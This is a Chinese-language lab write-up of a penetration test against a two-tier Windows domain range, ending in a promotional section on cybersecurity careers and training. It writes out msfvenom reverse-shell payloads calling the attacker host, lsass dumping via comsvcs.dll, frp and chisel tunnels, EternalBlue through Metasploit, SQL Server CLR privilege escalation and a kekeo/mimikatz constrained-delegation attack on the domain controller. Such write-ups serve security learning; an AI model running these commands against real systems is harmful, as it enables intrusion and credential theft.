渗透实战：内网域渗透

前言

本文记录了一次针对具有二层内网的域环境进行渗透测试的过程，文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具，最后通过约束委派拿下了域控。其间运用了很多小工具，文章较长，下面开始此次渗透长途之旅。

网络拓扑如下：

web服务器

先来波端口扫描：

直接发现了内网的ip，这里需要提前说明一点，由于靶场搭建的问题，weblogic只在10.10.20.12这个ip上才能解析，所以需要调整下ip设置，等做完weblogic后我们在改回192段。

smb信息收集

smbmap -H 10.10.20.12
smbclient -N -L //10.10.20.12
enum4linux -a 10.10.20.12

rpcclient -U '' 10.10.20.12
smbclient -U '' -L \\10.10.20.12

weblogic漏洞利用

知道了weblogic的具体版本，可以直接去查询漏洞，也可以用工具自动扫描下；

这里直接用CVE的漏洞来打一波；

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.20.4  LPORT=1234 -f psh-cmd > exploit.ps1

shell复制代码# use exploit/multi/handler

# set payload windows/x64/meterpreter/reverse_tcp

# set lhost 10.10.20.4

# set lport 1234

# exploit

迁移下进程，开始抓密码；

爆破一波，原来是个弱口令；

接下来换成CS更方便；

./teamserver 192.168.223.138  123456

java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xmx1024M -javaagent:hook.jar -jar cobaltstrike.jar

信息收集一波；

weblogic数据解密

在介绍下用注册表抓取hash的方法；

抓取成功后拖回本地；

在本地解密；

这里有了hash之后，尝试下不用msf和cs来渗透；

evil-winrm -u administrator -H ccef208c6485269c20db2cad21734fe7 -i 192.168.223.165

sql复制代码get-process -name lsass

rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 500 C:\temp\lsass.dmp full

rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 500 C:\windows\temp\lsass.dmp full

ls C:\windows\temp\lsass.dmp

download C:\windows\temp\lsass.dmp

lsass.dmp`重命名为`weblogic.dmp
pypykatz lsa minidump weblogic.dmp -o weblogic.txt

并没有发现预想中存在的密码，所以下面换个其他的方法；

解密工具可以解密了；

至此，web服务器算是搞定了，下面开始个人主机的渗透。

个人主机

永恒之蓝利用

进入内网，个人主机已经无法直接出网了，需要搭建代理。

frp代理

服务端

ini复制代码[common]
bind_addr =192.168.223.138
bind_port =7000
token = Xa3BJf2l5enmN6Z7A8mv
[socks5]
type = tcp
remote_port =7777
plugin = socks5

客户端

ini复制代码[common]
server_addr = 192.168.223.138
server_port = 7000
token = Xa3BJf2l5enmN6Z7A8mv
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5
css复制代码proxychains nmap -v -Pn -T3 -sV -n -sT --open -p 
22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4
505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,
878,7001,389,902,1194,1080,88 10.10.20.7

这里还可以尝试下用chisel；

./chisel server -p 8000 --reverse
./chisel client 192.168.223.138:8000 R:8100:socks

在kali里设置好代理配置；

proxychains nmap --script smb-vuln* -p 445 -sT -Pn 10.10.20.7 -vvv

很明显了，永恒之蓝；这里还是用frp代理，通过msf来方便点。

bash复制代码msf6 > setg Proxies socks5:192.168.223.138:7777
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run

成功拿下个人主机，照例先抓下密码；

这里在介绍另一种抓取密码的思路，在目标机抓取后拿回本地来解密分析，在某些场合下会有奇效；

取回本地，minidump方式解开

查看结果；

为了后续方便，我们可以用CobaltStrike来继续，虽然msf和CS会话可以互通，但我还是习惯直接种马后使用。这里web服务器已经提前在CS上反弹好了，精华在于CS的中转功能。

因为此 Win7 不出网，随后只能通过 CobaltStrike 设置中转：

先创建中转监听器：

生成木马：

利用msf上传并运行木马后机器上线；

信息收集一波；

可以看到个人主机后面还有2台机器，分别是域控服务器和数据库服务器。在进行下一步渗透之前，先需要把二级代理搭建好。

二级代理搭建

先看看frp如何搭建二级代理；

kali上配置服务端；

web服务器上配置；（一个服务端，一个客户端）

个人主机上配置客户端；

扫描测试下；

在用chisel搭建一个2级代理；

kali上配置服务端；

web服务器上配置客户端和服务端；

个人主机上配置客户端；

扫描测试下；

proxychains nmap -sC -sV -F -sT -Pn 10.10.10.18 -vvv

数据库服务器

这里先借助bloodhound来分析下域环境，以确定下一步的渗透思路，具体的安装及使用这里就不赘述了，我之前的文章有过详细介绍。

到达域管理员的最短路径；

用户：redteam.red/sqlserver 允许委托OWA的cifs服务（DC控制器）

至此有了后续基本的渗透思路，就是通过委派攻击拿下域控，下面开始逐步实施；

根据之前端口扫描的结果，做下信息收集；

结合我们已经取得的个人主机控制权，首先当前进程是没有域管的，所以暂且放弃令牌窃取：

这里用到了约束委派攻击的知识，简单来说，在Windows系统中，普通用户的属性中没有委派（Delegation）这个选项卡，只有服务账号、主机账号才有。服务账号（Service Account），域内用户的一种类型，服务器运行服务时所用的账号，将服务运行起来并加入域。例如MS SQL Server在安装时，会在域内自动注册服务账号SqlServiceAccount，这类账号不能用于交互式登录。（更具体知识要自己补一下）

由于我们已经拿到了一个域用户的账户密码，尝试查找约束委派的用户：

ini复制代码AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b 
"DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-
allowedtodelegateto=*))" 
cn distinguishedName msds-allowedtodelegateto

sqlserver 的用户是被设置了约束委派，但还需要密码；之前知道1433是开放的，爆破一波试试；

这样就可以执行xp_cmdshell 命令了；

发现权限很小只是一个普通服务权限，下面开始提权；

使用 SharpSQLTools 开启目标 clr：（要用Proxifier挂上代理，就不截图了）

SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami

然后启用并调用命令：

SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami

提取成功。

下面用msf来进行文件上传；

上传一个CS的木马；

然后在用高权限来运行cs木马；

成功上线；

抓取下密码；

至此，数据库服务器渗透结束，下面开始对域控的渗透。

域控

经过前面的分析，这里就是纯粹的利用约束委派拿下域控。

1、利用 kekeo 请求该用户的 TGT：

TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"

2、然后使用这张 TGT

perl复制代码(TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi) 获取域机器的 ST：
TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam
.red@REDTEAM.RED.kirbi

kekeo.exe "tgs::s4u
 /tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.
RED.kirbi /user:Administrator@redteam.red
/service:cifs/owa.redteam.red"

3、使用 mimikatz 将 ST2 导入当前会话即可，运行 mimikatz 进行 ptt：

ruby复制代码mimikatz kerberos::ptt 
TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam
.red@REDTEAM.RED.kirbi

成功拿到域控权限；

题外话

网络安全行业特点

1、就业薪资非常高，涨薪快 2022年猎聘网发布网络安全行业就业薪资行业最高人均33.77万！

2、人才缺口大，就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表：我国网络空间安全人才 需求140万人，而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W，现在从事网络安全行业的从业人员只有10W人。

行业发展空间大，岗位非常多

网络安全行业产业以来，随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性，尤其是掌握工作中的核心网络架构、安全技术，在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升，所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟，升值空间一路看涨，这也是为什么受大家欢迎的主要原因。

从某种程度来讲，在网络安全领域，跟医生职业一样，越老越吃香，因为技术愈加成熟，自然工作会受到重视，升职加薪则是水到渠成之事。

关于网络安全学习指南

学习网络安全技术的方法无非三种:

第一种是报网络安全专业，现在叫网络空间安全专业，主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习，多媒体技术，信息检索、舆情分析等。

第二种是自学，就是在网上找资源、找教程，或者是想办法认识一-些大佬，抱紧大腿，不过这种方法很耗时间，而且学习没有规划，可能很长一段时间感觉自己没有进步，容易劝退。

第三种就是去找培训。

接下来，我会教你零基础入门快速入门上手网络安全。

网络安全入门到底是先学编程还是先学计算机基础？这是一个争议比较大的问题，有的人会建议先学编程，而有的人会建议先学计算机基础，其实这都是要学的。而且这些对学习网络安全来说非常重要。但是对于完全零基础的人来说又或者急于转行的人来说，学习编程或者计算机基础对他们来说都有一定的难度，并且花费时间太长。

第一阶段：基础准备 4周~6周

这个阶段是所有准备进入安全行业必学的部分，俗话说：基础不劳，地动山摇

第二阶段：web渗透

学习基础 时间：1周 ~ 2周：

① 了解基本概念：（SQL注入、XSS、上传、CSRF、一句话木马、等）为之后的WEB渗透测试打下基础。
② 查看一些论坛的一些Web渗透，学一学案例的思路，每一个站点都不一样，所以思路是主要的。
③ 学会提问的艺术，如果遇到不懂得要善于提问。

配置渗透环境 时间：3周 ~ 4周：

① 了解渗透测试常用的工具，例如（AWVS、SQLMAP、NMAP、BURP、中国菜刀等）。
② 下载这些工具无后门版本并且安装到计算机上。
③ 了解这些工具的使用场景，懂得基本的使用，推荐在Google上查找。

渗透实战操作 时间：约6周：

① 在网上搜索渗透实战案例，深入了解SQL注入、文件上传、解析漏洞等在实战中的使用。
② 自己搭建漏洞环境测试，推荐DWVA，SQLi-labs，Upload-labs，bWAPP。
③ 懂得渗透测试的阶段，每一个阶段需要做那些动作：例如PTES渗透测试执行标准。
④ 深入研究手工SQL注入，寻找绕过waf的方法，制作自己的脚本。
⑤ 研究文件上传的原理，如何进行截断、双重后缀欺骗(IIS、PHP)、解析漏洞利用（IIS、Nignix、Apache）等，参照：上传攻击框架。
⑥ 了解XSS形成原理和种类，在DWVA中进行实践，使用一个含有XSS漏洞的cms，安装安全狗等进行测试。
⑦ 了解一句话木马，并尝试编写过狗一句话。
⑧ 研究在Windows和Linux下的提升权限，Google关键词：提权

以上就是入门阶段

第三阶段：进阶

已经入门并且找到工作之后又该怎么进阶？详情看下图

给新手小白的入门建议：
新手入门学习最好还是从视频入手进行学习，视频的浅显易懂相比起晦涩的文字而言更容易吸收，这里我给大家准备了一套网络安全从入门到精通的视频学习资料包免费领取哦！

如果你对网络安全入门感兴趣，那么你需要的话可以在下方扫码领取！！